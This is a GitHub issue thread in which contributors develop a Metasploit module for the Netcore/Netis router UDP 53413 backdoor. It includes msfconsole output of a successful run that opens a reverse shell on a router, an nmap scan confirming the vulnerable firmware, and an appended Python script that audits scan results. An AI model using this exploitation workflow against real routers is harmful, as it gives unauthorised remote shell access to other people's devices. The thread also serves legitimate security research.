Closed nixawk closed 8 years ago
Edit: Just purchased a WF2414, will be here Tuesday. I volunteer to get this module done.
@h00die, is your router produced by netcore/netdis?
Device should be in next week. In the meantime, I've started the module here: https://github.com/h00die/metasploit-framework/commit/713a061bffea6efc35fe49ce9d82dc1d0d73d1a1 The TrendMicro post says there is a hardcoded password in the firmware; I haven't found a site that has what the password is. Anyone want to find that?
https://www.exploit-db.com/exploits/38470/ may contain one of the creds
For WF2414, it looks like netis(WF2414)-V1.4.29433 is the patched version; netis(WF2414)-V1.4.27001 should be vulnerable, and is available.
@h00die I've created a module as follows.
```
msf exploit(netcore_udp_53413_backdoor) > info

       Name: Netcore Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
   Platform:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.1      yes       The target address
  RPORT    53413            yes       The target port
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Payload information:

Description:
  Routers manufactured by Netcore, a popular brand for networking
  equipment in China, have a wide-open backdoor that can be fairly
  easily exploited by attackers. These products are also sold under
  the Netis brand name outside of China. This backdoor allows
  cybercriminals to easily run arbitrary code on these routers,
  rendering it vulnerable as a security device.

References:
  https://www.seebug.org/vuldb/ssvid-90227
  http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/

msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian

msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress - 12.54% done (196/1563 bytes)
[*] Command Stager progress - 25.08% done (392/1563 bytes)
[*] Command Stager progress - 37.62% done (588/1563 bytes)
[*] Command Stager progress - 50.16% done (784/1563 bytes)
[*] Command Stager progress - 62.70% done (980/1563 bytes)
[*] Command Stager progress - 75.24% done (1176/1563 bytes)
[*] Command Stager progress - 87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500

pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web
```
Source code?
I'll make the code clear and give a module PR.
Wifi router is in, WF2414. Downgraded to Netis(WF2414)-V1.4.27001,2014.05.07 16:10
Ran nmap to verify the downgrade is vuln:
```
h00die@kali:~# nmap -sV -sU -p 53413 192.168.1.1

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-18 21:11 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0023s latency).
PORT      STATE SERVICE VERSION
53413/udp open  xdmcp   XDMCP (unwilling; status: .Login:)
MAC Address: 04:8D:38:XX:XX:XX (Netcore Technology)
```
which is exactly what it says on the disclosure, so it looks solid.
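Added example (not part of the thread or of the Metasploit module): a Python audit that reads nmap normal output like the scan above and flags which hosts on your own network answer on UDP 53413. The sample scan text, the `audit` and `verdict` names and the verdict labels are assumptions made for this illustration.

```python
import re

PORT = "53413/udp"  # the port scanned in the thread

# Constructed sample in nmap's normal output format (addresses and MAC are made up).
SAMPLE = """\
Nmap scan report for 192.0.2.1
Host is up (0.0023s latency).
PORT      STATE SERVICE VERSION
53413/udp open  xdmcp   XDMCP (unwilling; status: .Login:)
MAC Address: 04:8D:38:00:00:01 (Netcore Technology)

Nmap scan report for 192.0.2.2
Host is up (0.0031s latency).
PORT      STATE         SERVICE
53413/udp open|filtered unknown

Nmap scan report for 192.0.2.3
Host is up (0.0019s latency).
PORT      STATE  SERVICE
53413/udp closed unknown
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+)$")
PORT_RE = re.compile(r"^(\d+/udp)\s+(\S+)\s+\S+\s*(.*)$")
MAC_RE = re.compile(r"^MAC Address: \S+ \((.+)\)$")

def verdict(state):
    # "open" means the service answered a probe; "open|filtered" means no
    # reply came back, so for UDP the scan proves nothing either way.
    if state == "open":
        return "exposed"
    return "inconclusive" if state == "open|filtered" else "not exposed"

def audit(nmap_text):
    """Return one finding per host that has a 53413/udp row in the scan."""
    findings, host = [], None
    for line in nmap_text.splitlines():
        if m := HOST_RE.match(line):
            host = m.group(1)
        elif (m := PORT_RE.match(line)) and m.group(1) == PORT:
            findings.append({"host": host, "state": m.group(2), "verdict": verdict(m.group(2)),
                             "login_banner": ".Login:" in m.group(3), "vendor": None})
        elif (m := MAC_RE.match(line)) and findings and findings[-1]["host"] == host:
            findings[-1]["vendor"] = m.group(1)
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Hosts that come back "inconclusive" need a rescan with `-sV`, as in the command above, before they can be ruled in or out.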
This appears to be resolved.
http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
https://www.seebug.org/vuldb/ssvid-90227
I will try to add a new module to exploit the backdoor.